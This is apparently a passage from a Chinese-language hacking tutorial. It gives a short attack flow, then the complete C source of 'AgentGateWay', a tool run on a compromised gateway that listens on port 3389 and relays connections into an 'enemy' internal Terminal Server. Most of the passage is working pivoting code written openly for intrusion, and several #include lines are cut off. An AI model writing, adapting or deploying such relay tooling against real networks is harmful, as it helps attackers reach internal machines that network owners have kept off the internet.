攻击流程如下:
<1>在网关服务器202.2.2.2运行我们的程序AgentGateWay,他监听TCP 3389端口[改成别的,那我们就要相应的修改TermClient了]等待我们去连接。
<2>我们202.1.1.1用TermClient连接到202.2.2.2:3389。
<3>202.2.2.2.接受202.1.1.1的连接,然后再建立一个TCP socket连接到自己内网的TermServer[192.168.1.3]
<4>这样我们和敌人内网的TermServer之间的数据通道就建好了,接下来网关就忠实的为我们转发数据啦。当我们连接到202.2.2.2:3389的时候,其实出来的界面是敌人内网的192.168.1.3,感觉怎么样?:)
程序代码如下:
/*
Module Name:AgentGateWay.c
CopyRight(c) eyas
说明:端口重定向工具,在网关上运行,把端口重定向到内网的IP、PORT,
就可以进入内网了
sock[0]==>sClient sock[1]==>sTarget
*/
#include
#include
#include "TCPDataRedird.c"
#define TargetIP TEXT("192.168.1.3")
#define TargetPort (int)3389
#define ListenPort (int)3389//监听端口
#pragma comment(lib,"ws2_32.lib")
int main()
{
WSADATA wsd;
SOCKET sListen=INVALID_SOCKET,//本机监听的socket
sock[2];
struct sockaddr_in Local,Client,Target;
int iAddrSize;
HANDLE hThreadC2T=NULL,//C2T=ClientToTarget
hThreadT2C=NULL;//T2C=TargetToClient
DWORD dwThreadID;
__try
{
if(WSAStartup(MAKEWORD(2,2),&wsd)!=0)
{
printf("\nWSAStartup() failed:%d",GetLastError());
__leave;
}
sListen=socket(AF_INET,SOCK_STREAM,IPPROTO_IP);
if(sListen==INVALID_SOCKET)
{
printf("\nsocket() failed:%d",GetLastError());
__leave;
}
Local.sin_addr.s_addr=htonl(INADDR_ANY);
Local.sin_family=AF_INET;
Local.sin_port=htons(ListenPort);
Target.sin_family=AF_INET;
Target.sin_addr.s_addr=inet_addr(TargetIP);
Target.sin_port=htons(TargetPort);
if(bind(sListen,(struct sockaddr
*)&Local,sizeof(Local))==SOCKET_ERROR)
{
printf("\nbind() failed:%d",GetLastError());
__leave;
}
if(listen(sListen,1)==SOCKET_ERROR)
{
printf("\nlisten() failed:%d",GetLastError());
__leave;
}
//scoket循环
while(1)
{
printf("\n\n*************Waiting Client Connect
to**************\n\n");
iAddrSize=sizeof(Client);
//get socket sClient
sock[0]=accept(sListen,(struct sockaddr *)&Client,&iAddrSize);
if(sock[0]==INVALID_SOCKET)
{
printf("\naccept() failed:%d",GetLastError());
break;
}
printf("\nAccept client==>%s:%d",inet_ntoa(Client.sin_addr),
ntohs(Client.sin_port));
//create socket sTarget
sock[1]=socket(AF_INET,SOCK_STREAM,IPPROTO_IP);
if(sock[1]==INVALID_SOCKET)
{
printf("\nsocket() failed:%d",GetLastError());
__leave;
}
//connect to target port
if(connect(sock[1],(struct sockaddr
*)&Target,sizeof(Target))==SOCKET_ERROR)
{
printf("\nconnect() failed:%d",GetLastError());
__leave;
}
printf("\nconnect to target 3389 success!");
//创建两个线程进行数据转发
hThreadC2T=CreateThread(NULL,0,TCPDataC2T,(LPVOID)sock,0,&dwThreadID);
hThreadT2C=CreateThread(NULL,0,TCPDataT2C,(LPVOID)sock,0,&dwThreadID);
//等待两个线程结束
WaitForSingleObject(hThreadC2T,INFINITE);
WaitForSingleObject(hThreadT2C,INFINITE);
CloseHandle(hThreadC2T);
CloseHandle(hThreadT2C);
closesocket(sock[1]);
closesocket(sock[0]);
printf("\n\n*****************Connection
Close*******************\n\n");
}//end of sock外循环
}//end of try
__finally
{
if(sListen!=INVALID_SOCKET) closesocket(sListen);
if(sock[0]!=INVALID_SOCKET) closesocket(sock[0]);
if(sock[1]!=INVALID_SOCKET) closesocket(sock[1]);
if(hThreadC2T!=NULL) CloseHandle(hThreadC2T);
if(hThreadT2C!=NULL) CloseHandle(hThreadT2C);
WSACleanup();
}
return 0;
}
|
